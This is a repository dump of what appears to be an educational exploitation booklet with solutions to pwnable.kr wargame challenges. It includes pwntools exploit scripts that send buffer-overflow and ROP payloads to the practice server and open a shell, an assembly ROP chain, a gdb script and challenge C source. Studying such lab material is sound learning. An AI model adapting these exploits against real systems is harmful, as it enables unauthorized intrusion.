42 |                 MAGIC_BBUF_PLUS_ESP_TWEAK,
43 |                 struct.pack("<I", b_buf-ESP_TWEAK_WHEN_RESTORED)
44 |             ),
45 |             (
46 |                 MAGIC_STACK_VAR,
47 |                 struct.pack("<I", stack_var)
48 |             )
49 |     ]
50 |     for (magic, replacement) in magic_to_replace:
51 |         exploit = exploit.replace(magic, replacement)
52 |    
53 |     #send exploit and allow attacker to interact with shell
54 |     p.sendline(exploit)
55 |     p.interactive()
56 | 
57 | def yoink_hexnum(buf):
58 |     hex_string = re.search(b"0x[0-9a-fA-F]+",buf).group(0).decode("utf8")
59 |     return int(hex_string,16)
60 | 
61 | def getenv():
62 |     envs = {"target": TARGET, "mock": MOCK}
63 |     if len(sys.argv) < 2 or sys.argv[1] not in envs:
64 |         print("use: ./solution.py mock, or: ./solution.py target")
65 |         exit(1)
66 |     return envs[sys.argv[1]]
67 |         
68 | if  __name__ == "__main__":
69 |     main()
70 | 


--------------------------------------------------------------------------------
/exercises/18_unlink/unlink.gdb:
--------------------------------------------------------------------------------
 1 | echo Putting breakpoint...\n
 2 | break *main+195
 3 | echo Waiting for user input...\n
 4 | c
 5 | d 1
 6 | echo A\n
 7 | x/4xw *(int*)($ebp-0x14)
 8 | echo B\n
 9 | x/4xw *(int*)($ebp-0x0C)
10 | echo C\n
11 | x/4xw *(int*)($ebp-0x10)
12 | 


--------------------------------------------------------------------------------
/exercises/18_unlink/unlink_disassembly.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/18_unlink/unlink_disassembly.png


--------------------------------------------------------------------------------
/exercises/19_blukat/blukat.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <stdlib.h>
 4 | #include <fcntl.h>
 5 | char flag[100];
 6 | char password[100];
 7 | char* key = "3\rG[S/%\x1c\x1d#0?\rIS\x0f\x1c\x1d\x18;,4\x1b\x00\x1bp;5\x0b\x1b\x08\x45+";
 8 | void calc_flag(char* s){
 9 | 	int i;
10 | 	for(i=0; i<strlen(s); i++){
11 | 		flag[i] = s[i] ^ key[i];
12 | 	}
13 | 	printf("%s\n", flag);
14 | }
15 | int main(){
16 | 	FILE* fp = fopen("/home/blukat/password", "r");
17 | 	fgets(password, 100, fp);
18 | 	char buf[100];
19 | 	printf("guess the password!\n");
20 | 	fgets(buf, 128, stdin);
21 | 	if(!strcmp(password, buf)){
22 | 		printf("congrats! here is your flag: ");
23 | 		calc_flag(password);
24 | 	}
25 | 	else{
26 | 		printf("wrong guess!\n");
27 | 		exit(0);
28 | 	}
29 | 	return 0;
30 | }
31 | 
32 | 


--------------------------------------------------------------------------------
/exercises/19_blukat/cat_password.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/19_blukat/cat_password.png


--------------------------------------------------------------------------------
/exercises/19_blukat/file_permissions.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/19_blukat/file_permissions.png


--------------------------------------------------------------------------------
/exercises/19_blukat/group_check.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/19_blukat/group_check.png


--------------------------------------------------------------------------------
/exercises/19_blukat/locally.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/19_blukat/locally.png


--------------------------------------------------------------------------------
/exercises/19_blukat/nano.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/19_blukat/nano.png


--------------------------------------------------------------------------------
/exercises/19_blukat/python.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/19_blukat/python.png


--------------------------------------------------------------------------------
/exercises/19_blukat/solution.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/19_blukat/solution.png


--------------------------------------------------------------------------------
/exercises/19_blukat/stack_canary.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/19_blukat/stack_canary.png


--------------------------------------------------------------------------------
/exercises/19_blukat/xxd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/19_blukat/xxd.png


--------------------------------------------------------------------------------
/exercises/20_horcruxes/exploit.asm:
--------------------------------------------------------------------------------
 1 | BITS 32
 2 | 
 3 | %define exp_answer_stack_delta -0x74
 4 | %define return_value_stack_delta 0x4
 5 | %define buffer_char 0x41
 6 | 
 7 | %define ropme   0x0809fffc
 8 | 
 9 | %define diary   0x0809fe4b
10 | %define ring    0x0809fe6a
11 | %define cup     0x0809fe89
12 | %define locket  0x0809fea8
13 | %define diadem  0x0809fec7
14 | %define nagini  0x0809fee6
15 | %define harry   0x0809ff05
16 | 
17 |     times return_value_stack_delta - exp_answer_stack_delta db buffer_char
18 |     dd diary
19 |     dd ring
20 |     dd cup
21 |     dd locket
22 |     dd diadem
23 |     dd nagini
24 |     dd harry
25 |     dd ropme
26 | 


--------------------------------------------------------------------------------
/exercises/20_horcruxes/healer.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/20_horcruxes/healer.png


--------------------------------------------------------------------------------
/exercises/20_horcruxes/normal_play.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/20_horcruxes/normal_play.png


--------------------------------------------------------------------------------
/exercises/20_horcruxes/solution.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/python
 2 | from __future__ import print_function
 3 | import pwn
 4 | import re
 5 | import sys
 6 | 
 7 | INT_MAX = 0x7fffffff
 8 | 
 9 | with open("exploit","rb") as fh:
10 |     exploit = fh.read()
11 | 
12 | p = pwn.remote("pwnable.kr", 9032)
13 | total = 0
14 | 
15 | def canonize_signed(num):
16 |     num = canonize_unsigned(num)
17 |     if num > INT_MAX:
18 |         num -= 2**32
19 | 
20 |     return num
21 | 
22 | def canonize_unsigned(num):
23 |     if num < 0:
24 |         num += 2**32
25 |     num = num % 2**32
26 |     return num
27 | 
28 | def main():
29 |     bypass_menu(3)
30 |     give_experience(exploit, already_string=True)
31 |     skip_line()
32 |     collect_horcruxes()
33 |     bypass_menu(3)
34 |     prompt()
35 |     give_experience(canonize_signed(total))
36 | 
37 | 
38 | def bypass_menu(opt):
39 |     global p
40 |     p.recvuntil("Menu:")
41 |     print("[X] Bypassing menu.")
42 |     p.sendline(str(opt))
43 | 
44 | def give_experience(exp, already_string=False):
45 |     global p
46 |     if not already_string:
47 |         exp = str(exp)
48 |     print("[X] Waiting for process to ask about total experience.")
49 |     p.recvuntil("earned? : ")
50 |     print("[X] Sending answer: {}{}".format(exp[:20], "..." if len(exp)>20 else ""))
51 |     p.sendline(exp)
52 | 
53 | def skip_line():
54 |     global p
55 |     line = p.recvline()
56 |     print("[X] Noted and disregarded input line: \"{}\"".format(line))
57 | 
58 | def collect_horcruxes():
59 |     print("[X] Collecting horcruxes.")
60 |     global total
61 |     for i in range(7):
62 |         horcrux = int(re.search("\(EXP \+([^)]+)\)",p.recvline()).group(1))
63 |         print("[X] Found horcrux {}".format(hex(canonize_unsigned(horcrux))))
64 |         total = canonize_unsigned(total + horcrux)
65 | 
66 |     print("[X] Horcrux total {} (base 10 {})".format(hex(total), canonize_signed(total)))
67 | 
68 | def prompt():
69 |     print("[X] Holding the program until given user prompt...")
70 |     try:
71 |         input()
72 |     except:
73 |         pass
74 | 
75 | main()
76 | p.interactive()
77 | 


--------------------------------------------------------------------------------
/images/00_fd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/00_fd.png


--------------------------------------------------------------------------------
/images/01_collision.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/01_collision.png


--------------------------------------------------------------------------------
/images/02_bof.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/02_bof.png


--------------------------------------------------------------------------------
/images/03_flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/03_flag.png


--------------------------------------------------------------------------------
/images/04_passcode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/04_passcode.png


--------------------------------------------------------------------------------
/images/05_random.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/05_random.png


--------------------------------------------------------------------------------
/images/06_input.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/06_input.png


--------------------------------------------------------------------------------
/images/07_leg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/07_leg.png


--------------------------------------------------------------------------------
/images/08_mistake.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/08_mistake.png


--------------------------------------------------------------------------------
/images/09_shellshock.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/09_shellshock.png


--------------------------------------------------------------------------------
/images/10_coin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/10_coin.png


--------------------------------------------------------------------------------
/images/11_blackjack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/11_blackjack.png


--------------------------------------------------------------------------------
/images/12_lotto.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/12_lotto.png


--------------------------------------------------------------------------------
/images/13_cmd1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/13_cmd1.png


--------------------------------------------------------------------------------
/images/14_cmd2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/14_cmd2.png


--------------------------------------------------------------------------------
/images/15_uaf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/15_uaf.png


--------------------------------------------------------------------------------
/images/16_memcpy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/16_memcpy.png


--------------------------------------------------------------------------------
/images/17_asm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/17_asm.png


--------------------------------------------------------------------------------
/images/18_unlink.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/18_unlink.png


--------------------------------------------------------------------------------
/images/19_blukat.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/19_blukat.png


--------------------------------------------------------------------------------
/images/20_horcruxes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/20_horcruxes.png


--------------------------------------------------------------------------------
/images/Blue_Screen_of_AAAAA.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/Blue_Screen_of_AAAAA.jpg


--------------------------------------------------------------------------------
/images/a_little_bit_of_everything.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/a_little_bit_of_everything.jpg


--------------------------------------------------------------------------------
/images/access_control_file_list.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/access_control_file_list.png


--------------------------------------------------------------------------------
/images/aint_no_rule.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/aint_no_rule.jpg


--------------------------------------------------------------------------------
/images/alice_bob_suid.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/alice_bob_suid.png


--------------------------------------------------------------------------------
/images/all_challenges.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/all_challenges.png


--------------------------------------------------------------------------------
/images/ascii_table.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/ascii_table.png


--------------------------------------------------------------------------------
/images/baton.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/baton.png


--------------------------------------------------------------------------------
/images/bearwithme.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/bearwithme.png


--------------------------------------------------------------------------------
/images/buffer_overflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/buffer_overflow.png


--------------------------------------------------------------------------------
/images/c_heap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/c_heap.png


--------------------------------------------------------------------------------
/images/canary.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/canary.jpg


--------------------------------------------------------------------------------
/images/casino.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/casino.png


--------------------------------------------------------------------------------
/images/chroot_jail.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/chroot_jail.png


--------------------------------------------------------------------------------
/images/complications.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/complications.png


--------------------------------------------------------------------------------
/images/cpr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/cpr.png


--------------------------------------------------------------------------------
/images/debugging_interaction.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/debugging_interaction.png


--------------------------------------------------------------------------------
/images/dep.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/dep.png


--------------------------------------------------------------------------------
/images/dep_sign.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/dep_sign.png


--------------------------------------------------------------------------------
/images/environment.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/environment.png


--------------------------------------------------------------------------------
/images/ew_math.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/ew_math.jpg


--------------------------------------------------------------------------------
/images/expectation_vs_reality.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/expectation_vs_reality.jpg


--------------------------------------------------------------------------------
/images/file_descriptors.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/file_descriptors.png


--------------------------------------------------------------------------------
/images/file_permissions.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/file_permissions.png


--------------------------------------------------------------------------------
/images/file_permissions_how_to_read.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/file_permissions_how_to_read.png


--------------------------------------------------------------------------------
/images/hash_function_creation.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/hash_function_creation.jpg


--------------------------------------------------------------------------------
/images/hash_functions.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/hash_functions.jpg


--------------------------------------------------------------------------------
/images/hello_assembly_debugger.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/hello_assembly_debugger.png


--------------------------------------------------------------------------------
/images/hello_assembly_x86.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/hello_assembly_x86.png


--------------------------------------------------------------------------------
/images/hello_assembly_x86_resized.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/hello_assembly_x86_resized.png


--------------------------------------------------------------------------------
/images/if_statement_assembly.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/if_statement_assembly.png


--------------------------------------------------------------------------------
/images/im_so_random.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/im_so_random.png


--------------------------------------------------------------------------------
/images/nc_demo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/nc_demo.png


--------------------------------------------------------------------------------
/images/obfuscated_code.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/obfuscated_code.png


--------------------------------------------------------------------------------
/images/packed.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/packed.jpg


--------------------------------------------------------------------------------
/images/passwd_suid.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/passwd_suid.png


--------------------------------------------------------------------------------
/images/pizza_hack.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/pizza_hack.jpg


--------------------------------------------------------------------------------
/images/pma.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/pma.jpg


--------------------------------------------------------------------------------
/images/process_memory.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/process_memory.jpg


--------------------------------------------------------------------------------
/images/pwnable_splash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/pwnable_splash.png


--------------------------------------------------------------------------------
/images/qa.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/qa.png


--------------------------------------------------------------------------------
/images/robot_laptop.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/robot_laptop.jpg


--------------------------------------------------------------------------------
/images/rop_stack_layout.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/rop_stack_layout.png


--------------------------------------------------------------------------------
/images/rube_goldberg.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/rube_goldberg.jpg


--------------------------------------------------------------------------------
/images/sandwich.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/sandwich.png


--------------------------------------------------------------------------------
/images/simple_assembly.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/simple_assembly.png


--------------------------------------------------------------------------------
/images/ssh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/ssh.png


--------------------------------------------------------------------------------
/images/stack.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/stack.jpg


--------------------------------------------------------------------------------
/images/stack_canary_illustration.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/stack_canary_illustration.png


--------------------------------------------------------------------------------
/images/stack_frame.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/stack_frame.png


--------------------------------------------------------------------------------
/images/stack_frame_ret_to_libc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/stack_frame_ret_to_libc.png


--------------------------------------------------------------------------------
/images/stack_frame_ret_to_libc_old.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/stack_frame_ret_to_libc_old.png


--------------------------------------------------------------------------------
/images/suid_passwd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/suid_passwd.png


--------------------------------------------------------------------------------
/images/system_call.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/system_call.png


--------------------------------------------------------------------------------
/images/szimpla_kert.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/szimpla_kert.jpg


--------------------------------------------------------------------------------
/images/target_environment.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/target_environment.png


--------------------------------------------------------------------------------
/images/texput.log:
--------------------------------------------------------------------------------
 1 | This is pdfTeX, Version 3.14159265-2.6-1.40.18 (TeX Live 2017/Debian) (preloaded format=pdflatex 2018.10.23)  9 DEC 2019 17:16
 2 | entering extended mode
 3 |  restricted \write18 enabled.
 4 |  %&-line parsing enabled.
 5 | **a_hands_on_introduction_to_system_exploitation.tex
 6 | 
 7 | ! Emergency stop.
 8 | <*> ..._on_introduction_to_system_exploitation.tex
 9 |                                                   
10 | End of file on the terminal!
11 | 
12 |  
13 | Here is how much of TeX's memory you used:
14 |  3 strings out of 492982
15 |  148 string characters out of 6134895
16 |  53911 words of memory out of 5000000
17 |  3671 multiletter control sequences out of 15000+600000
18 |  3640 words of font info for 14 fonts, out of 8000000 for 9000
19 |  1141 hyphenation exceptions out of 8191
20 |  0i,0n,0p,1b,6s stack positions out of 5000i,500n,10000p,200000b,80000s
21 | !  ==> Fatal error occurred, no output PDF file produced!
22 | 


--------------------------------------------------------------------------------
/images/ubuntu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/ubuntu.png


--------------------------------------------------------------------------------
/images/vtable_diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/vtable_diagram.png


--------------------------------------------------------------------------------
/images/wannacry.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/images/wannacry.jpg


--------------------------------------------------------------------------------
/license.txt:
--------------------------------------------------------------------------------
1 | This document and renditions of it may not be used for commercial purposes, or the promotion thereof, directly or indirectly. To be blunt, you MAY include the link or even a full copy as "suggested reading" for your $800 training; and you MAY produce a dramatic reading of the document, list yourself as an author and upload the result to your website; but you MAY NOT produce a dramatic reading of the document, list yourself as an author and upload the result to be suggestively featured on the website where you promote your $800 training. This document was written so that interested parties will have access to it freely and with no strings attached, please respect that.
2 | 


--------------------------------------------------------------------------------
/makefile:
--------------------------------------------------------------------------------
 1 | booklet: a_first_introduction_to_system_exploitation.tex demos
 2 | 	pdflatex a_first_introduction_to_system_exploitation.tex
 3 | 	pdflatex a_first_introduction_to_system_exploitation.tex #for table of contents
 4 | 
 5 | demos: fd_demo hash_demo xxd_demo
 6 | 
 7 | hash_demo: ./code/hash_demo.py
 8 | 	./code/hash_demo.py > ./code/hash_demo.out
 9 | 
10 | fd_demo: ./code/fd_demo.c
11 | 	gcc -o ./code/fd_demo ./code/fd_demo.c
12 | 
13 | xxd_demo: ./code/xxd_demo
14 | 	xxd ./code/xxd_demo > ./code/xxd_demo.hex
15 | 
16 | clean: 
17 | 	rm -f *.aux *.log *.out *.toc *.pdf
18 | 
19 | all: booklet
20 | 
21 | 
22 | 


--------------------------------------------------------------------------------